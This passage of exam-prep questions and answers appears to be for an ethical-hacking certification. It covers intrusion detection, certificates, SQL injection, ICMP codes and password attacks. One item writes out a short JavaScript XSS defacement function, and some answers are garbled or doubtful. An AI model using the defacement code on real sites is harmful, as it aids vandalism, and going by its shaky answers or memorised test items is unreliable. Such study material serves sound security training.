Provides only user behavior measurement and analysis While a NIDS provides only user behavior measurement and analysis, this is NOT a limitation of a NIDS. This is the purpose of an IDS. A NIDS has some limitations. Network tunnels and encryption can defeat detection by a NIDS. A NIDS experiences a large number of false positives. Also, new attack types will not be detected by a NIDS until the attack signature is captured.
What item is contained in the digital certificate that enables the receiver of the certificate to send an encrypted email to the sender?
Public key While it is not the only item required that resides in the certificate, the public key is used to encrypt the session key that is used to encrypt the email that is sent to the sender of the certificate. There is also a hash value (called the thumbprint) and a hash algorithm (called the thumbprint algorithm) that will be required to access the public key, which will arrive in a hashed format.
Which documentation provides an ethical hacker with the scope of targets and allowed testing techniques and tools?
ROE The ROE (rules of engagement) documentation provides an ethical hacker the scope of targets and allowed testing techniques and tools. The ROE is guideline documentation for performing the penetration test, including allowed activities like port scanning, social engineering, and network sniffing, and restricted activities like password cracking and SQL injection attacks. It also includes specific IP address ranges, testing periods, contact information for the team and affected systems and networks, prevention measures for alerting law enforcement, and how collected information will be handled after testing.
Which statement best describes the purpose of incident management?
Restore systems to normal service operation as quickly as possible The statement that best describes the purpose of incident management is to restore all systems to normal service operation as quickly as possible. It should also prevent future recurrence of the incident. For example, if you discover a malware infection and you determine that an anti-malware update would have prevented this issue, you should ensure that the update is deployed to all devices as part of the incident management process. The process also includes removing the malware infection (incident response) and documenting the steps you took to ensure all systems are clean (incident handling).
Which type of access control is supported by standard routers?
Rule-based access control Rule-based access control, also known as access control lists (ACL) is supported by standard routers based on MAC or IP addresses. Access control is a safeguard security requirement. Role-based access control uses roles. Users are assigned to these roles, and the roles are assigned specific permissions. Role-based access control is used mostly by applications.
You are reviewing the log files for your company's primary Web server. You notice that there are several instances where the following request is made: SELECT login_id, full_name FROM customers Which attack type could this represent?
SQL injection The SELECT statement could be an example of a SQL injection attack. SQL injection attacks include SQL statements, such as SELECT, CREATE TABLE, and DELETE TABLE statements.
Which statement is true about SSL?
SSL operates above the Transport layer. Secure Sockets Layer (SSL) operates above the Transport layer. Although it is often used in conjunction with Secure Hypertext Transfer Protocol (S-HTTP), SSL is not an active encryption standard. The latest version of SSL (version 3.0) is deprecated. Transport Layer Security (TLS) has replaced it. SSL is not protected against cipher-block chaining (CBC) attacks. TLS version 1.1 added this protection. SSL does not encrypt each message independently, as S-HTTP does. SSL encrypts the entire communication channel.
Which of the following statements regarding security policies is NOT true?
Security policies are technology specific. Security policies are NOT technology specific. Security policies usually contain general policies regarding security, such as that all devices should be protected by antimalware and updated regularly. Including technology-specific policies would mean that new policies would have to be added or policies would need to be changed each time new technology was adopted.
You need to exchange confidential information with a trusted partner. The partner indicates to you that he will issue certificates. These certificates are signed by the same entity that verifies the certificate's identity. Which term is used for the type of certificate issued by the partner?
Self-signed certificates The partner is issuing self-signed certificates. With self-signed certificates, the certificates are both signed and verified by the same entity. Self-signed certificates should be used for internal organizational needs. Do not use self-signed certificates for sensitive, public connections. If you do not want to buy an SSL certificate, you should at least set up your own certificate authority with its own root certificate. Signed certificates are those issued by a certification authority (CA). They definitely should be used for public connections. X.509 certificates are the standard digital certificates for a public key infrastructure (PKI). Online certificates are those issued by a PKI for online usage.
Which of the following scenarios could be prevented by using EFS?
Sensitive information was obtained from a stolen company laptop Encrypting File System (EFS) is a feature built into Windows that allows for encrypting sensitive data. This mechanism, which encrypts data on the laptop, makes it impossible to read the data if anyone steals the laptop
You discover that an attacker has used filesnarf to attack your network. Which of the following best describes what this tool does?
Sniffs NFS traffic on the network Filesnarf sniffs Network File System (NFS) traffic on the network. The macof tool floods a switched LAN with random MAC addresses. Filesnarf and macof are both tools in the dsniff suite of tools.
Your company has hired an ethical hacker to assess your company's network security. He will need to perform packet sniffing and logging, in addition to detecting any network intrusions. Which tool will he most likely use?
Snort Snort includes sniffer, packet logger, and network intrusion detection system modes. Snort is an open-source network intrusion detection system (NIDS) that can analyze network traffic in real-time. Wireshark is a network protocol analyzer for sniffing and logging packets, but it is not a full-featured NIDS. AirSnort is a WEP encryption key cracker for 802.11b wireless networks, but does not provide network intrusion detection.
Your network has increasingly come under attack. Management has asked you to take measures to detect and prevent future attacks. You need to purchase a tool or device that provides intrusion detection, packet sniffing, and logging. Which tool should you recommend?
Snort You should recommend Snort because it provides three primary functions: intrusion detection, packet sniffing, and packet logging. Nmap does not provide intrusion detection. It performs network and security scans. It can identify what services a host is running, fingerprint the operating system and applications on a host, determine the firewall a host is using, or perform an inventory of a local network.
You have been hired as an ethical hacker by a small company. The company's network uses UTP cable that connects 45 devices to a central switch. Which type of network topology is implemented?
Star A star network is implemented. A star network consists of a central device, such as a switch, to which all devices connect. In a mesh topology, every device or host on the network connects to every other host on the network. This network provides redundancy. In a bus topology, all devices or hosts on the network connect to a single network backbone cable. This network topology usually uses coaxial cable. In a ring topology, all devices or hosts on the network connect to a ring of cable, with traffic flowing in one direction.
Which of the following is an attack on physical security?
Tailgating Tailgating, in which an unauthorized person enters the facility by following an authorized person who has successfully authenticated to the physical access system, is an attack on physical security. It is also considered a form of social engineering in that it uses non-technical means to achieve its ends
You routinely test network connectivity using the ping command. Recently, you noticed that a router discarded an ICMP packet and sent a time exceeded message to the source host. Which of the following conditions would cause this to occur?
The TTL value is 1, and the destination host is several hops away. When a router discards an ICMP packet and sends a time exceeded message to the source host, this is an indication that the destination is away than the TTL value allows. In this case, the TTL value is 1, meaning that you have one more hop (router) to which you can connect. If the destination host is several hops away, then a TTL value of 1 will not allow the packet to reach its destination.
Another member of your security team is confused about cross-site scripting (XSS) attacks. You explain how phishing attempts can use XSS to replace existing content on the webpage. She decides to write a simple JavaScript XSS defacement function. Which document object method(s) should you suggest she use? (Choose all that apply.)
The two most important document object methods for JavaScript XSS defacement attacks are getElementById() and getElementsByTagName(). The getElementById() method retrieves an element node based on its identifier, such as the field name, like username or password. The getElementsByTagName() method retrieves an array of element nodes based on the tag name like h1 or a. Using these two methods, an attacker can easily deface the website as follows: function defaceFirstHeader(){ document.getElementsByTagName("h1")[0].innerHTML = "YOU'VE BEEN HACKED!"; }
A team of developers is creating mobile apps that target Apple iOS devices. Which of the following vulnerabilities should they address when using Objective-C? (Choose all that apply.)
They should address: code injection , buffer overflow, string formatting, thread racing vulnerabilities when using Objective-C. Input validation is the best defense against code injection, buffer overflow, and string formatting vulnerabilities. Objective-C is object-oriented, so objects are stored in the heap, reducing the likelihood of stack-based overflows. Objective-C also provides objects like NSString to manipulate strings and prevent string-formatting vulnerabilities. Like most modern development environments, Objective-C supports multi-threading, so developers must ensure that they avoid thread race conditions by designing atomic actions and leveraging synchronization in code. Objective-C is also particularly prone to race conditions because of its complex signal-handling mechanism.
Each layer must be able to exist on a physically independent system Each layer should exchange information only with the layers above and below it There is a presentation layer, a logic layer, and a data layer Which system architecture has the above characteristics?
Three-tier The three-tier design, one variation of N-tier system architecture, uses three layers of processes, with each layer located on different logical systems. Each tier performs a different and distinct role. The user utilizes a presentation layer for the user interface, which accesses middleware, where the business logic resides, which in turn, accesses the actual data. Three legged refers to a firewall with three interfaces: one to the LAN, one to the Internet< and another facing the DMZ.
What is the purpose of using the Mole tool?
To automate SQL injection attacks The purpose of using the Mole tool is to automate SQL injection attacks. DataThief is a program to extract (reverse engineer) data points from a graph
During security testing, what is the purpose of analyzing the interrupts within a piece of software?
To ensure critical data is not changed on the system You should analyze interrupts within software to ensure critical data is not changed on the system. One of the ways that malware can execute malicious actions is by using processor interrupts or event callbacks. These event callbacks interrupt the processor to stop what it may have been doing, take an action, and then return to the application. Examining these callbacks can reveal hacking. For example, a callback for network service by the notepad.exe application makes no sense. This could indicate a malicious callback. A virus could also effectively hide by interrupting virus scans and returning a false result.
You are performing a ping sweep of a local subnet. Which reply message would you receive if routers are blocking ICMP?
Type 3/Code 13 A type 3 is a destination unreachable message. A code of 13 indicates that a response is administratively prohibited, which indicates a router is set to block ICMP. According to RFC792 and RFC1122, type 3 messages can be one of the following code: 0 - Net Unreachable 1 - Host Unreachable 2 - Protocol Unreachable 3 - Port Unreachable 4 - Fragmentation Needed and Don't Fragment was Set 5 - Source Route Failed 6 - Destination Network Unknown 7 - Destination Host Unknown 8 -Source Host Isolated 9 - Communication with Destination Network is Administratively Prohibited 10 - Communication with Destination Host is Administratively Prohibited 11 - Destination Network Unreachable for Type of Service 12 -Destination Host Unreachable for Type of Service 13 - Communication Administratively Prohibited 14 - Host Precedence Violation 15 - Precedence cutoff in effect
You have 25 computers connected to a wireless access point that is providing an IP address in the 192.168.5.0/24 network and a default gateway address 192.168.5.1/24 to the clients. If the default gateway is not routing traffic sent to the gateway to a public IP address, how will clients be affected?
Unable to connect to the Internet, but able to connect to other wireless stations Clients will be unable to connect to the Internet, but can connect to other wireless stations. When the gateway is not routing traffic to a public IP address, connections to the Internet will not be possible but local connections will be. Since all of the wireless clients have IP addresses in the same subnet, they will have no problem communicating. But Internet traffic must eventually be routed to a public IP address before traffic can access the Internet.
How does a hybrid password attack work?
Uses a word list based on variations of dictionary words to discover the password A hybrid password attack uses a list of dictionary word variations to find passwords by mixing uppercase and lowercase letters, adding numbers, reversing the character order, slightly misspelling it and including special characters. Some examples include PaSSword, passWord123, drowssap, paswrd and p@$$w0rd. Password cracking tools like John the Ripper and Cain & Abel can perform hybrid password attacks.
Which standard provides guidelines for the responsible and open transfer of conventional arms and sensitive or dual-use military resources?
Wassenaar Arrangement The Wassenaar Arrangement, often mistakenly called the Wassenaar Agreement, is a multilateral export control agreement with 41 participating states, including many former Warsaw Pact countries. It promotes transparency and greater responsibility during transfers of conventional arms and dual-use goods and technologies. Common Criteria is an international security standard for IT products. This standard is a baseline for evaluating software functional requirements. The Rainbow Books are cybersecurity standards and guidelines published by National Computer Security Center (NCSC). The ISO 2700 series was developed by the Joint Technical Committee of the International Organization for Standardization and the International Electrotechnical Commission. This standard explains the purpose of an Information Security Management System (ISMS).
Your company has decided to hire an ethical hacker to help identify issues with your company's network. Which of the following terms can also be used to describe this position?
White hat An ethical hacker can also be described as a white hat. A gray hat is a computer hacker or computer security expert whose ethical standards fall somewhere between purely altruistic (white hat) and purely malicious (black hat).
Which of the following is a common Service Oriented Architecture (SOA) vulnerability that can be addressed by filters and gateways?
XML denial of service issues A common SOA vulnerability is an XML denial of service, in which the attacker crafts an XML message with very large payloads, recursive content, excessive nesting, malicious external entities, or with malicious DTDs (Data Type Definitions). It can be mitigated by using XML filters and XML gateways, and by ensuring that the XML parser in use is robust and the XML parsing process is not processor intensive.
An administrator has configured SMTP and HTTP services running on a FreeBSD server. She wants to allow standard email and web traffic across registered ports 25, 80, and 443. However, any unauthorized access should be logged and denied. Which daemon should you use for logging and simple access control?
tcpd You should use the tcpd daemon for logging and access control. The tcpd daemon is a FreeBSD implementation of the TCP Wrapper, which can monitor incoming service requests for services like Telnet, SMTP (25), FTP, HTTP (80) and HTTPS (443). The tcpd daemon can log and provide simple access control. This could prevent a malicious Telnet attack from using standard open ports for other services, like SMTP and HTTP.
As your company's ethical hacker, you often perform routine penetration tests to check the security for your company's network. Last week, an attacker posted details obtained through operating system fingerprinting about your company's servers. You need to perform the same type of check to verify what information is available. Which tool should you use?
www.netcraft.com You should use www.netcraft.com to perform operating system (OS) fingerprinting. This tool will provide a list of servers and the OSs running on them. The www.changedetection.com site provides change monitoring and notifications to users for specific Web sites. It does not provide OS fingerprinting information. The www.webextractor.com site extracts information from Web pages. It an harvest URLs, phone and fax numbers, email addresses, as well as meta tag information and body text. It does not provide OS fingerprinting information. The www.whois.com site provides information on the ownership of specific domain names. It does not provide OS fingerprinting information.